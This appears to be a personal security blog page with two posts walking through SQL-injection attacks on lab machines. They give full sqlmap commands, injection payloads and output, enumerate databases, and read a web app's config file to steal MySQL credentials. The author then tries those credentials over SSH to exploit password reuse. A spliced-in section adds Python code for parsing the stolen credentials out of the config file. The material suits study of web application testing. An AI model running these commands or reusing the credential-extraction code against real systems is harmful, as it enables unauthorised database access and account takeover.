Showing posts with label sqlmap. Show all posts

Tuesday, July 31, 2012

ignore switch -D on Firebird (SQLMAP)

Hi there, I want to share my experience.
I found an error on 192.168.56.102/index.php?page=beritaDetail&id=103, so I used sqlmap to retrieve the databases. I typed this in sqlmap:
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --threads 8 --dbs"
A few minutes later I had a problem: my sqlmap couldn't retrieve the database names.
This is the result:
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
I tried reading the sqlmap user's manual at http://sqlmap.sourceforge.net/doc/README.html. sqlmap supports attacking this database (Firebird); this is its list of supported databases, with the Python binding each one needs for a direct connection:

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.
But then why couldn't my sqlmap retrieve the database names?

So I asked my friend for a solution, and he answered that it means sqlmap won't be able to retrieve database names because everything lives in a single one: I just have --tables, and I must ignore the -D switch on Firebird (the same applies to SQLite and MS Access).

So I tried ignoring -D, like this:
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --threads 8 --dbms Firebird --tables"
and as I saw, I got past the problem. This is the result:
"web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:33:30] [INFO] fetching tables for database: Firebird_masterdb
[14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"


Tuesday, April 24, 2012

simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

Hello guys, now I want to share web hacking with another attack vector.
I have a victim at address 192.168.56.101. I want to see which services are running, so I use nmap:
root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
root@archaveliano:/home/localhost# 


There I find a form to input a user ID, and I try entering a " ' " in it. I get a syntax error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

It's time to work. I opened my sqlmap and typed this: "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --threads 8 --dbms MySQL --dbs". The switches: -u is the URL; --cookie is the cookie, because this web app requires a login; -p is the vulnerable parameter; --risk is the risk of the tests to perform (max 3); --level is the level of tests to perform (max 5); --threads is the maximum number of concurrent HTTP(s) requests (max 10); --dbms forces the back-end DBMS to this value; and --dbs enumerates the DBMS databases.

It didn't take long; I could retrieve the databases like this:
[22:22:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:22:06] [INFO] fetching database names
[22:22:06] [INFO] the SQL query used returns 4 entries
[22:22:06] [INFO] starting 4 threads
[22:22:06] [INFO] retrieved: information_schema
[22:22:06] [INFO] retrieved: mysql
[22:22:06] [INFO] retrieved: fbip
[22:22:06] [INFO] retrieved: dvwa
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

Now I have 4 databases. Now I want to take over the mysql database, and I enter this in sqlmap: "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --threads 8 -D mysql --tables --dbs"
But I have a problem, and the problem is like this:
[22:15:20] [WARNING] no column(s) found
[22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

I tried to find another way, and I remembered that sqlmap can not only take over the database but also read files from the site, so now I'll try that. But before I try, I need to know where the file I need is, so I need DirBuster to find the file.
The file I need is at /config/config.inc.php, so in sqlmap I enter this:
"./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1" and I took over the web config:
sqlmap saves the retrieved file under output/<target host>/files/:
Now I know the MySQL user and password of this web app. I try to log in with that MySQL user and password, but I hit a problem again:
root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server
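Two things a practitioner wants at this point: a quick way to pull the credentials out of the file `--file-read` returned, and a way to understand why the remote `mysql` login is refused even though the password is right. The following is an added example, not code from the post, DVWA or sqlmap. The `config.inc.php` contents are constructed (the post's real file is not shown on the page; the password here is made up), as is the `mysql.user` table it checks against; the host matching is a simplified model of how MySQL matches the host part of `'user'@'host'` (`%` and `_` wildcards only, without the netmask and CIDR forms MySQL also accepts).

```python
import re

# Constructed sample of a DVWA config.inc.php as sqlmap --file-read would hand it back
# (the real file from the post is not shown on the page; these values are made up).
SAMPLE_CONFIG = r"""<?php
# If you are having problems connecting to the MySQL database, check these settings.
$_DVWA = array();

# Database management system to use
$DBMS = 'MySQL';

# Database variables
$_DVWA[ 'db_server' ]   = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = "S3cret!";   // constructed password, not the post's
?>
"""

# Matches  $_DVWA[ 'key' ] = 'value';  with either quote style, optional whitespace
# and an optional trailing comment.
ASSIGN_RE = re.compile(
    r"""\$_DVWA\s*\[\s*(['"])(?P<key>[^'"]+)\1\s*\]\s*=\s*(['"])(?P<val>.*?)\3\s*;""")

def parse_dvwa_config(text):
    """Pull the $_DVWA[...] settings out of a retrieved config.inc.php."""
    settings = {}
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("#", "//", "/*", "*")):
            continue                        # PHP comment lines
        m = ASSIGN_RE.search(line)
        if m:
            settings[m.group("key")] = m.group("val")
    return settings

def mysql_host_matches(pattern, client_host):
    """Simplified model of MySQL host matching for 'user'@'host': '%' matches any
    run of characters, '_' exactly one, everything else literally. MySQL's
    netmask and CIDR host forms are deliberately not modelled here."""
    regex = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c)
                    for c in pattern)
    return re.fullmatch(regex, client_host) is not None

def remote_login_allowed(grants, user, client_host):
    """grants: (user, host) rows as in mysql.user. A False result is what the
    client sees as ERROR 1130 'Host ... is not allowed to connect'."""
    return any(u == user and mysql_host_matches(h, client_host) for u, h in grants)

# Constructed mysql.user contents for a default install: root only from localhost.
DEFAULT_GRANTS = [("root", "localhost"), ("root", "127.0.0.1"), ("dvwa", "localhost")]

if __name__ == "__main__":
    creds = parse_dvwa_config(SAMPLE_CONFIG)
    print("db_user=%s db_password=%s" % (creds["db_user"], creds["db_password"]))
    print("root from 192.168.56.1 allowed:",
          remote_login_allowed(DEFAULT_GRANTS, "root", "192.168.56.1"))
```

With only `'root'@'localhost'`-style rows, the check returns False for 192.168.56.1, which is exactly the ERROR 1130 above: the credentials are valid, but the account is not granted for that client host, so the password only becomes useful from the box itself or wherever else it has been reused.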

I try SSH, because people often get used to reusing the same password.
root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

And this is the result:

Very simple, right?!